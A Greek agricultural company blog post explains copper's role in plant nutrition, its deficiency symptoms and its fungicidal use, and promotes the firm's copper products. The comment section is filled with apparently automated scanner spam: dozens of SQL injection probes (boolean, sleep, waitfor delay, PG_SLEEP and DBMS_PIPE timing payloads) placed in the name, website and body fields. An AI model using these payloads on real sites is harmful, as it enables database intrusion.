Ποιός ο ρόλος του χαλκού στην καλλιέργεια?

Posted by phytorgan 21/11/2018 89 Comment(s)

 

ΠΟΙΟΣ Ο ΡΟΛΟΣ ΤΟΥ ΧΑΛΚΟΥ ΣΤΗΝ ΚΑΛΛΙΕΡΓΕΙΑ?

 

Ο χαλκός - Cu είναι ένα ιχνοστοιχείο που  παίζει πολύ σημαντικό ρόλο στην θρέψη των φυτών. Διευκολύνει την αναπνοή και τη φωτοσύνθεση και είναι σημαντικός για τον μεταβολισμό των φυτών. Είναι συστατικό μιας ποικιλίας ενζύμων και των κυτταρικών τοιχωμάτων , επομένως είναι σημαντικό για την αντοχή των φυτών. Ο χαλκός επηρεάζει επίσης τη γεύση, την περιεκτικότητα σε ζάχαρη και τη διάρκεια αποθήκευσης των καρπών.

 

Ωστόσο υπάρχουν παράγοντες που μπορεί να επηρεάσουν την διαθεσιμότητα του Χαλκού, όπως:

 

-Ανάπτυξη ρίζας - ο χαλκός δεν κινείται εύκολα μέσα στο έδαφος, οπότε οτιδήποτε μειώνει την ανάπτυξη των ριζών εμποδίζει επίσης τα φυτά να αφομοιώσουν τον  χαλκό.

-Το pH - η διαθεσιμότητα χαλκού είναι υψηλότερη σε όξινα εδάφη και χαμηλότερη σε αλκαλικά εδάφη.

-Οργανική ύλη - η οργανική ύλη μειώνει τη διαθεσιμότητα χαλκού (αν και απελευθερώνεται καθώς η οργανική ύλη αποδομείται).

-Υγρασία - ο χαλκός είναι λιγότερο διαθέσιμος σε κορεσμένα εδάφη.

-Ο ψευδάργυρος - υπερβολικός ψευδάργυρος μειώνει τη διαθεσιμότητα χαλκού

-Το άζωτο - περίσσεια αζώτου μπορεί να αποτρέψει τη μεταφορά του χαλκού γύρω από τα φυτά και η ανεπάρκεια αζώτου μπορεί να μειώσει την πρόσληψη χαλκού.

-Φωσφόρος - η περίσσεια φωσφόρου μπορεί να μειώσει την πρόσληψη χαλκού.

 

Τροφοπενία Χαλκού:

Τα βασικότερα συμπτώματα έλλειψης χαλκού απο τα φυτά είναι τα εξής:

  • Σκουροπράσινα φύλλα με νεκρωτικές κηλίδες (Αρχικά στάδια)
  • Συστροφή ή/και μαρασμός φύλλων
  • Αποκοπή φύλλων (Προχωρημένο στάδια)
  • Κακή ανάπτυξη
  • Καθυστερημένη άνθηση
  • Στειρότητα

Για την αντιμετώπιση  ή/και την πρόληψη τροφοπενιών είναι αναγκαία η χρήση σκευασμάτων με υψηλή περιεκτικότητα σε χαλκό.

Τα OligoActiv COPPER & IMPULSE  με την ειδική σύνθεσή τους, καθώς και με την μεγάλη διαλυτότητα τους στο νερό ενισχύουν την πρόσληψη του συμπλκοποιημένου χαλκού από το φυτό και τον καθιστούν βιοδιαθέσιμο για το φυτό, με αποτέλεσμα την ταχεία διόρθωση έλλειψης χαλκού. Επιπρόσθετα, ο χαλκός εμποδίζει την είσοδο παρασίτων στα φυτά που έχουν υποστεί τραυματισμούς. 100% Συμπλοκοποιημένος (γλυκονικός) χαλκός.

 

Ο χαλκός στην φυτοπροστασία:

Εκτός από τον ρόλο του στη θρέψη, ο χαλκός έχει ισχυρή αντιμυκητιακή δράση (Ωομύκητες, Ασκομύκητες, Αδηλομύκητες) και αντιβακτηριακή δράση. Εξαίρεση αποτελούν οι μύκητες των Erysiphaceae και ο μύκητας Alternaria solani. Ασθένειες όπως ο εξώασκος, το κορύνεο, το φουζικλάδιο, ο περονόσπορος, η φυτόφθορα, οι βακτηριώσεις κ.α. μπορούν να προληφθούν με χαλκούχα σκευάσματα. Τόσο η δόση όσο και ο χρόνος εφαρμογής των χαλκούχων σκευασμάτων πρέπει να γίνεται σύμφωνα με τις απαιτήσεις κάθε καλλιέργειας ώστε να αποφευχθεί ο κίνδυνος της φυτοτοξικότητας.

Ο μηχανισμός δράσης των χαλκούχων δεν είναι πλήρως γνωστός μέχρι σήμερα. Φαίνεται όμως ότι κατά τη διάρκεια της βλάστησης των σπορίων των ευαίσθητων μυκήτων εκκρίνονται μηλικό οξύ και αμινοξέα τα οποία μεταβάλλουν το pH, με αποτέλεσμα τη διαλυτοποίηση μέρους του χαλκού που έχει εναποτεθεί στη φυτική επιφάνεια. Έτσι παρατηρούνται στους μύκητες και στα βακτήρια τα εξής:

  1. Τοξικότητα από υπερβολική συσσώρευση ιόντων Cu2+
  2. Μη εξειδικευμένη μετουσίωση πρωτεϊνών
  3. Καταστροφή της ημιπερατότητας της κυτταρικής μεμβράνης

Ο ψεκασμός με βορδιγάλειο πολτό COPPERGAN 20 WP ή με υδροξείδιο του χαλκού XIDROCOPP 40 WG αποτελεί τον πιο αποτελεσματικό τρόπο πρόληψης ασθενειών που εμφανίζονται στις καλλιέργειες κυρίως τους Φθινοπωρινούς και Χειμερινούς μήνες, καθώς και στις αρχές της Άνοιξης.

 

89 Comment(s)

zFPWdwPk:
10/08/2020, 06:26:32 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:26:43 PM

1

zFPWdwPk:
10/08/2020, 06:34:29 PM

1

zFPWdwPk:
10/08/2020, 06:34:30 PM

1

zFPWdwPk:
10/08/2020, 06:35:24 PM

1

zFPWdwPk:
10/08/2020, 06:35:26 PM

1

zFPWdwPk:
10/08/2020, 06:35:32 PM

1

zFPWdwPk:
10/08/2020, 06:35:36 PM

1

zFPWdwPk:
10/08/2020, 06:36:18 PM

1

zFPWdwPk:
10/08/2020, 06:36:21 PM

1

zFPWdwPk:
10/08/2020, 06:36:22 PM

-1 OR 2+876-876-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:36:23 PM

-1 OR 3+876-876-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:36:23 PM

-1 OR 2+344-344-1=0+0+0+1

zFPWdwPk:
10/08/2020, 06:36:24 PM

-1 OR 3+344-344-1=0+0+0+1

zFPWdwPk:
10/08/2020, 06:36:25 PM

-1' OR 2+489-489-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:36:26 PM

-1' OR 3+489-489-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:36:26 PM

-1' OR 2+627-627-1=0+0+0+1 or '6TQS2wDH'='

zFPWdwPk:
10/08/2020, 06:36:27 PM

-1' OR 3+627-627-1=0+0+0+1 or '6TQS2wDH'='

zFPWdwPk:
10/08/2020, 06:36:28 PM

-1" OR 2+462-462-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:36:29 PM

-1" OR 3+462-462-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:36:31 PM

if(now()=sysdate(),sleep(15),0)

zFPWdwPk:
10/08/2020, 06:36:34 PM

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

zFPWdwPk:
10/08/2020, 06:36:37 PM

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

zFPWdwPk:
10/08/2020, 06:36:39 PM

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

zFPWdwPk:
10/08/2020, 06:36:41 PM

-1; waitfor delay '0:0:15' --

zFPWdwPk:
10/08/2020, 06:36:43 PM

-1); waitfor delay '0:0:15' --

zFPWdwPk:
10/08/2020, 06:36:46 PM

1 waitfor delay '0:0:15' --

zFPWdwPk:
10/08/2020, 06:36:48 PM

7k8XHare'; waitfor delay '0:0:15' --

zFPWdwPk:
10/08/2020, 06:36:51 PM

-5 OR 845=(SELECT 845 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:36:54 PM

-5) OR 856=(SELECT 856 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:36:57 PM

-1)) OR 642=(SELECT 642 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:37:00 PM

xcE6j4w6' OR 356=(SELECT 356 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:37:03 PM

eehLg94X') OR 748=(SELECT 748 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:37:06 PM

VDUlAEJt')) OR 778=(SELECT 778 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:37:10 PM

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

zFPWdwPk:
10/08/2020, 06:37:15 PM

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

zFPWdwPk:
10/08/2020, 06:37:15 PM

1'"

zFPWdwPk:
10/08/2020, 06:37:16 PM

@@je5X3

zFPWdwPk:
10/08/2020, 06:37:19 PM

1

zFPWdwPk:
10/08/2020, 06:37:21 PM

1

zFPWdwPk:
10/08/2020, 06:38:04 PM

1

zFPWdwPk:
10/08/2020, 06:38:07 PM

1

-1 OR 2+256-256-1=0+0+0+1 --:
10/08/2020, 06:38:08 PM

1

-1 OR 3+256-256-1=0+0+0+1 --:
10/08/2020, 06:38:09 PM

1

-1 OR 2+439-439-1=0+0+0+1:
10/08/2020, 06:38:09 PM

1

-1 OR 3+439-439-1=0+0+0+1:
10/08/2020, 06:38:10 PM

1

-1' OR 2+505-505-1=0+0+0+1 --:
10/08/2020, 06:38:11 PM

1

-1' OR 3+505-505-1=0+0+0+1 --:
10/08/2020, 06:38:11 PM

1

-1' OR 2+571-571-1=0+0+0+1 or 'aZ95xZrQ'=':
10/08/2020, 06:38:12 PM

1

-1' OR 3+571-571-1=0+0+0+1 or 'aZ95xZrQ'=':
10/08/2020, 06:38:12 PM

1

-1" OR 2+481-481-1=0+0+0+1 --:
10/08/2020, 06:38:13 PM

1

-1" OR 3+481-481-1=0+0+0+1 --:
10/08/2020, 06:38:14 PM

1

if(now()=sysdate(),sleep(15),0):
10/08/2020, 06:38:16 PM

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z:
10/08/2020, 06:38:18 PM

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z:
10/08/2020, 06:38:22 PM

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/:
10/08/2020, 06:38:25 PM

1

1 waitfor delay '0:0:15' --:
10/08/2020, 06:38:26 PM

1

Xl3N2IJK'; waitfor delay '0:0:15' --:
10/08/2020, 06:38:27 PM

1

pEKqv8o8' OR 828=(SELECT 828 FROM PG_SLEEP(15))--:
10/08/2020, 06:38:28 PM

1

TKBunLGf') OR 393=(SELECT 393 FROM PG_SLEEP(15))--:
10/08/2020, 06:38:30 PM

1

Cl9uVfsy')) OR 69=(SELECT 69 FROM PG_SLEEP(15))--:
10/08/2020, 06:38:31 PM

1

zFPWdwPk'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||':
10/08/2020, 06:38:34 PM

1

1'":
10/08/2020, 06:38:35 PM

1

@@KOWT0:
10/08/2020, 06:38:36 PM

1

zFPWdwPk:
10/08/2020, 06:38:38 PM

1

zFPWdwPk:
10/08/2020, 06:38:40 PM

1

zFPWdwPk:
10/08/2020, 06:39:28 PM

1

zFPWdwPk:
10/08/2020, 06:39:30 PM

1

zFPWdwPk:
10/08/2020, 06:39:39 PM

1

zFPWdwPk:
10/08/2020, 06:39:41 PM

1

zFPWdwPk:
10/08/2020, 06:39:42 PM

1

zFPWdwPk:
10/08/2020, 06:39:43 PM

1

zFPWdwPk:
10/08/2020, 06:39:45 PM

1

zFPWdwPk:
10/08/2020, 06:39:46 PM

1

zFPWdwPk:
10/08/2020, 06:39:47 PM

1

zFPWdwPk:
10/08/2020, 06:39:49 PM

1

zFPWdwPk:
10/08/2020, 06:39:51 PM

1

zFPWdwPk:
10/08/2020, 06:39:57 PM

1

zFPWdwPk:
10/08/2020, 06:39:58 PM

1

zFPWdwPk:
10/08/2020, 06:39:59 PM

1

zFPWdwPk:
10/08/2020, 06:40:02 PM

1

zFPWdwPk:
10/08/2020, 06:40:07 PM

1

zFPWdwPk:
10/08/2020, 06:40:10 PM

1

zFPWdwPk:
10/08/2020, 06:40:12 PM

1

zFPWdwPk:
10/08/2020, 06:40:16 PM

1

zFPWdwPk:
10/08/2020, 06:40:20 PM

1

zFPWdwPk:
10/08/2020, 06:40:25 PM

1

zFPWdwPk:
10/08/2020, 06:40:28 PM

1

zFPWdwPk:
10/08/2020, 06:40:31 PM

1

zFPWdwPk:
10/08/2020, 06:40:34 PM

1

zFPWdwPk:
10/08/2020, 06:40:35 PM

1

zFPWdwPk:
10/08/2020, 06:40:37 PM

1

zFPWdwPk:
10/08/2020, 06:40:37 PM

1

zFPWdwPk:
10/08/2020, 07:19:06 PM

1

zFPWdwPk:
10/08/2020, 06:33:42 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:33:45 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:34:33 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:34:36 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:34:39 PM, www.vulnweb.com
Reply

-1 OR 2+951-951-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:34:39 PM, www.vulnweb.com
Reply

-1 OR 3+951-951-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:34:41 PM, www.vulnweb.com
Reply

-1 OR 2+503-503-1=0+0+0+1

zFPWdwPk:
10/08/2020, 06:34:42 PM, www.vulnweb.com
Reply

-1 OR 3+503-503-1=0+0+0+1

zFPWdwPk:
10/08/2020, 06:34:42 PM, www.vulnweb.com
Reply

-1' OR 2+746-746-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:34:43 PM, www.vulnweb.com
Reply

-1' OR 3+746-746-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:34:44 PM, www.vulnweb.com
Reply

-1' OR 2+931-931-1=0+0+0+1 or 'b0R113MD'='

zFPWdwPk:
10/08/2020, 06:34:44 PM, www.vulnweb.com
Reply

-1' OR 3+931-931-1=0+0+0+1 or 'b0R113MD'='

zFPWdwPk:
10/08/2020, 06:34:45 PM, www.vulnweb.com
Reply

-1" OR 2+938-938-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:34:46 PM, www.vulnweb.com
Reply

-1" OR 3+938-938-1=0+0+0+1 --

zFPWdwPk:
10/08/2020, 06:34:48 PM, www.vulnweb.com
Reply

if(now()=sysdate(),sleep(15),0)

zFPWdwPk:
10/08/2020, 06:34:50 PM, www.vulnweb.com
Reply

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

zFPWdwPk:
10/08/2020, 06:34:53 PM, www.vulnweb.com
Reply

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

zFPWdwPk:
10/08/2020, 06:34:56 PM, www.vulnweb.com
Reply

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

zFPWdwPk:
10/08/2020, 06:34:58 PM, www.vulnweb.com
Reply

1 waitfor delay '0:0:15' --

zFPWdwPk:
10/08/2020, 06:35:01 PM, www.vulnweb.com
Reply

k7OJ6yxi'; waitfor delay '0:0:15' --

zFPWdwPk:
10/08/2020, 06:35:04 PM, www.vulnweb.com
Reply

kgUvnxsW' OR 953=(SELECT 953 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:35:07 PM, www.vulnweb.com
Reply

y3iHZcoL') OR 861=(SELECT 861 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:35:11 PM, www.vulnweb.com
Reply

q154lblk')) OR 140=(SELECT 140 FROM PG_SLEEP(15))--

zFPWdwPk:
10/08/2020, 06:35:13 PM, www.vulnweb.com
Reply

e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

zFPWdwPk:
10/08/2020, 06:35:15 PM, www.vulnweb.com
Reply

1'"

zFPWdwPk:
10/08/2020, 06:35:17 PM, www.vulnweb.com
Reply

@@n8tbU

zFPWdwPk:
10/08/2020, 06:35:20 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:35:22 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:35:58 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:36:04 PM, www.vulnweb.com
Reply

e

-1 OR 2+755-755-1=0+0+0+1 --:
10/08/2020, 06:36:05 PM, www.vulnweb.com
Reply

e

-1 OR 3+755-755-1=0+0+0+1 --:
10/08/2020, 06:36:06 PM, www.vulnweb.com
Reply

e

-1 OR 2+526-526-1=0+0+0+1:
10/08/2020, 06:36:08 PM, www.vulnweb.com
Reply

e

-1 OR 3+526-526-1=0+0+0+1:
10/08/2020, 06:36:08 PM, www.vulnweb.com
Reply

e

-1' OR 2+172-172-1=0+0+0+1 --:
10/08/2020, 06:36:10 PM, www.vulnweb.com
Reply

e

-1' OR 3+172-172-1=0+0+0+1 --:
10/08/2020, 06:36:10 PM, www.vulnweb.com
Reply

e

-1' OR 2+396-396-1=0+0+0+1 or 'PCtk7EXK'=':
10/08/2020, 06:36:11 PM, www.vulnweb.com
Reply

e

-1' OR 3+396-396-1=0+0+0+1 or 'PCtk7EXK'=':
10/08/2020, 06:36:12 PM, www.vulnweb.com
Reply

e

-1" OR 2+789-789-1=0+0+0+1 --:
10/08/2020, 06:36:12 PM, www.vulnweb.com
Reply

e

-1" OR 3+789-789-1=0+0+0+1 --:
10/08/2020, 06:36:13 PM, www.vulnweb.com
Reply

e

if(now()=sysdate(),sleep(15),0):
10/08/2020, 06:36:15 PM, www.vulnweb.com
Reply

e

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z:
10/08/2020, 06:36:18 PM, www.vulnweb.com
Reply

e

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z:
10/08/2020, 06:36:21 PM, www.vulnweb.com
Reply

e

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/:
10/08/2020, 06:36:23 PM, www.vulnweb.com
Reply

e

1 waitfor delay '0:0:15' --:
10/08/2020, 06:36:26 PM, www.vulnweb.com
Reply

e

0sT9NqjW'; waitfor delay '0:0:15' --:
10/08/2020, 06:36:28 PM, www.vulnweb.com
Reply

e

FyCx1DHi' OR 492=(SELECT 492 FROM PG_SLEEP(15))--:
10/08/2020, 06:36:30 PM, www.vulnweb.com
Reply

e

WDTDwZ3k') OR 948=(SELECT 948 FROM PG_SLEEP(15))--:
10/08/2020, 06:36:33 PM, www.vulnweb.com
Reply

e

kWiQUQpA')) OR 405=(SELECT 405 FROM PG_SLEEP(15))--:
10/08/2020, 06:36:35 PM, www.vulnweb.com
Reply

e

zFPWdwPk'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||':
10/08/2020, 06:36:38 PM, www.vulnweb.com
Reply

e

1'":
10/08/2020, 06:36:39 PM, www.vulnweb.com
Reply

e

@@vYtBN:
10/08/2020, 06:36:40 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:36:42 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:36:44 PM, www.vulnweb.com
Reply

e

zFPWdwPk:
10/08/2020, 06:36:45 PM, -1 OR 2+84-84-1=0+0+0+1 --
Reply

e

zFPWdwPk:
10/08/2020, 06:36:46 PM, -1 OR 3+84-84-1=0+0+0+1 --
Reply

e

zFPWdwPk:
10/08/2020, 06:36:46 PM, -1 OR 2+360-360-1=0+0+0+1
Reply

e

zFPWdwPk:
10/08/2020, 06:36:47 PM, -1 OR 3+360-360-1=0+0+0+1
Reply

e

zFPWdwPk:
10/08/2020, 06:36:48 PM, -1' OR 2+45-45-1=0+0+0+1 --
Reply

e

zFPWdwPk:
10/08/2020, 06:36:49 PM, -1' OR 3+45-45-1=0+0+0+1 --
Reply

e

zFPWdwPk:
Reply

e

zFPWdwPk:
Reply

e

zFPWdwPk:
10/08/2020, 06:36:52 PM, -1" OR 2+866-866-1=0+0+0+1 --
Reply

e

zFPWdwPk:
10/08/2020, 06:36:54 PM, -1" OR 3+866-866-1=0+0+0+1 --
Reply

e

zFPWdwPk:
10/08/2020, 06:36:56 PM, if(now()=sysdate(),sleep(15),0)
Reply

e

zFPWdwPk:
Reply

e

zFPWdwPk:
Reply

e

zFPWdwPk:
10/08/2020, 06:37:09 PM, 1 waitfor delay '0:0:15' --
Reply

e

zFPWdwPk:
10/08/2020, 06:37:14 PM, yHzfjHyR'; waitfor delay '0:0:15' --
Reply

e

zFPWdwPk:
Reply

e

zFPWdwPk:
Reply

e

zFPWdwPk:
Reply

e

zFPWdwPk:
10/08/2020, 06:37:27 PM, 1'"
Reply

e

zFPWdwPk:
10/08/2020, 06:37:28 PM
Reply

e

zFPWdwPk:
10/08/2020, 06:37:29 PM, @@0u7ZF
Reply

e

zFPWdwPk:
10/08/2020, 06:38:48 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:38:50 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:38:51 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:38:53 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:39:08 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:39:22 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:39:24 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:39:26 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:39:36 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 06:39:37 PM, www.vulnweb.com
Reply

1

zFPWdwPk:
10/08/2020, 07:16:34 PM, www.vulnweb.com
Reply

e

Leave a Comment